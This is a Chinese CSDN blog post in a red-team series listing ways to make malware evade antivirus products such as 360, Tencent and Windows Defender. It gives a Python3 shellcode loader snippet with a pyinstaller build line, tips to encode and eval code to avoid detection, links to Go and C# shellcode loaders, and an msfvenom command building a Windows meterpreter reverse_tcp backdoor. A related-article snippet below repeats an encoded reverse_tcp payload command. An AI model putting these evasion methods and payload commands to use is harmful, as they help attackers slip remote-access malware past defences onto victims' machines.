免杀方法简单汇总

最新推荐文章于 2024-05-19 13:30:00 发布
最新推荐文章于 2024-05-19 13:30:00 发布
阅读量3.5w 收藏 3
点赞数 2
分类专栏: 基础知识 红队 安全类
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_21193587/article/details/117538158
版权
安全类 同时被 3 个专栏收录
26 篇文章 3 订阅
订阅专栏
基础知识
12 篇文章 1 订阅
订阅专栏
红队
4 篇文章 0 订阅
订阅专栏

virscan.org/scan/

方法 1 静态文件特征修改

静态文件
源码去除些特殊关键字和特征字段
如 minikatz https://github.com/gentilkiwi/minikatz
替换掉图标 minikatz 和项目注释信息等,重新编译 2020-10 月当时最新得的 360 腾讯等免杀.

方法 2 msfloder

MSF 用加载器过 2020-10 当时最新 360 不过这个项目有点老 2012 年的

方法 3 python3 shellcode

python2 的已经很多会被查杀
python3 pyintaller 4.0 以上 shellcode
def shellCodeLoad(shellcode):
20210517171445
pyinstaller -F python3.py --noconsole -i 3.ico -n 生成文件名.exe
有时很多杀毒软件会查杀 ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
可以使用编码进行处理再 eval 动态执行代码
20210517172053

方法 4 golang 加载器

项目 1 github.com/jax777/shellcode-launch
cobalt strike payload 选 C 语言
项目 2 github.com/vyrus001/shellGo

方法 5 C# xor 加载器

github.com/antman1p/ShellCodeRunner

方法 6 第三方工具

如掩日.exe 可以过主流杀毒及 WindowsDefender

方法 7 msf 加壳 202010最新360等免杀
#安装依赖
sudo apt install mingw-64-tools mingw-w64-common g+±mingw-64 gcc-mingw-64 upx-ucl osslsigncode

#MSF 生成后门
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST= xx.xxx LPORT=4444 -f exe -o exploit.exe

Zack_snair
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
常用API方法简单汇总
06-12
常用 API 方法 简单 汇总
2022-2024常用经典技术汇总
03-27
技术通常涉及多种方法和技术,包括但不限于代码混淆、行为隐藏、利用系统漏洞以及对抗反病毒引擎。这篇资料《2022-2024常用经典技术汇总!》应该是对近年来流行的技巧和策略进行了全面的总结。 ...
常见的几种方法
路虽远,行将至。事虽难,做必达。
03-05 6525
攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18 1、自编码 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe 开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用 微步沙箱检测结果,检出率近一半,效果一般 ​​​ ...
一个简单好用的内网渗透工具,可 fscan,mimikatz,frp 等等。
logic1001的博客
12-29 1517
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
【网络安全】简单方法(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Python栈
05-19 1288
小七工具包里有很多的工具我就列出其中的一些常用的排名不分前后。
常用技术方法
whatday的专栏
04-23 7081
00. 概述 什么是?来自百科的注解: ,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没...
TideSec远控学习一(基础+msfvenom隐藏的参数)
fa1lr4in的小博客
02-08 2653
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 技术有一套:https://anhkgg.com/aanti-virus/ Meterpreter及对抗分析:https://www.freebuf.com/sectool/157122.html 艺术:https://www.4hou.com/technol...
方法(三)msf加载器
qq_56426046的博客
10-03 1035
编辑i686-w64-mingw32-gcc main.c -o mm.exe-lws2_32。Metasploit还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混。metasploit是一款开源的安全漏洞检测工具,同时Metasploit是费的工具,Framework(MSF)在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试。在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且。
C#实现计算年龄的简单方法汇总
12-26
vs2010测试通过,主要思想是由出生日期和当前日期,两个日期计算出年龄(岁、月、天) using System; using System.Collections.Generic; using System.Text; namespace PublicClass { public static class ...
知识大汇总(详解)
09-12
这是本人自己总结了有关的知识,介绍了各种技巧、特征码等,很全很详细。
C#文件加密方法汇总
01-20
本文实例汇总了C#文件加密方法。分享给大家供大家参考。具体实现方法如下: 1、AES加密类 代码如下: using System; using System.IO; using System.Security.Cryptography; using System.Text; namespace Utils { ...
智能拦截源码
03-02
作为智能拦截网站,转发数据的核心代码。
Cobalt Strike
szgyunyun的博客
07-25 1186
Strategic Cyber 责任有限公司发行了适用于 Windows、Linux 和 MacOS X 的 Cobalt Strike 软件包。 要安装 Cobalt Strike,只需将其存档解压到你的操作系统上。 系统要求 Cobalt Strike 要求 Oracle Java 1.8,Oracle Java 11, 或 OpenJDK 11。 如果你的系统上装有防病毒产品,请确保在安装 Cobalt Strike 前将其禁用。 Cobalt Strike 发行套件包含 Cobalt Strike
等价替换汇编指令
影月
09-21 2437
<br />A开头<br />-------------------------------------------------------------------------------------------------------------------------------------<br />add   改adc<br />ADD   改ADC<br />ADD 1 改 sub -1<br />add dword ptr ss:[ebp-130],edx ---------adc dword
木马原理及方法(超全)
热门推荐
zhangnn5的专栏
05-22 1万+
灰鸽子<br />概况   意为除被毒软件掉的软件。   灰鸽子简介:本工具为纯绿色工具,软件采用独特的查技巧可完全查灰鸽子全系列(VIP2005、vip2006、处理)木马,本软件已经过严格测试,备用本工具可以让您受灰鸽子木马的困饶.更新内容:软件增加在线更新功能,增加对VIP2006系列及处理的鸽子的查。 编辑本段原理解析灰鸽子原理技术全揭密   一.关于的来源   为了让我们的木马在各种毒软件的威胁下活的更久.   二.什么叫和查   可分为
***方法总结篇
weixin_33688840的博客
04-27 130
一.入口点加1法:1.用到工具PEditor2.特点:非常简单实用,但有时还会被卡巴查3.操作要点:用PEditor打开无壳***程序,把原入口点加1即可二.变化入口地址法:1.用到工具:OllyDbg,PEditor2.特点:操作也比较容易,而且效果比入口点加1点要佳.3.操作要点:用OD载入无壳的***程序,把入口点的前二句移到零区域去执行,然后又跳回到入口...
Cobalt Strike shellcode360
qq_18193739的博客
08-02 1291
地址:https://github.com/wei930630/go-shellcode-launcher。复制选中的shellcode代码,放入上面C++ xor加密shellcode代码,并运行。将生成的xor编码的shellcode 放入shellcode加载器。使用Cobalt Strike 生成shellcode 代码。使用Cobalt Strike 生成shellcode 代码。将选中的shellcode 代码,复制到新1.txt文件中。将上面的shellcode加载器编译为exe文件。
fscan使用方法:一键自动化、全方位漏洞扫描的开源工具
weixin_50464560的博客
05-21 9670
简介 fscan 是一个内网综合扫描工具,方便一键自动化、全方位漏洞扫描。 它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 源码链接:https://github.com/shadow1ng/fscan 主要功能 1.信息搜集: 存活探测(icmp) 端口扫描 2.爆破功能: 各类服务爆破(ssh、smb等) 数据
一款远控,马子体积小
qq_26063781的博客
08-21 1883
一款远控,马子体积小 大家可以用 下载地址:http://www.guokems.com/forum.php?mod=viewthread&tid=65&extra=
计算方法历年试题与解析
"这是一份计算方法的试题汇总,涵盖了计算方法的相关概念和应用,包括数值分析中的误差分析、插值、求积公式、牛顿迭代法、最小二乘拟合、特征值计算、迭代解法(如Jacobi法和Gauss-Seidel法)、插值多项式以及数值...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zack_snair

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值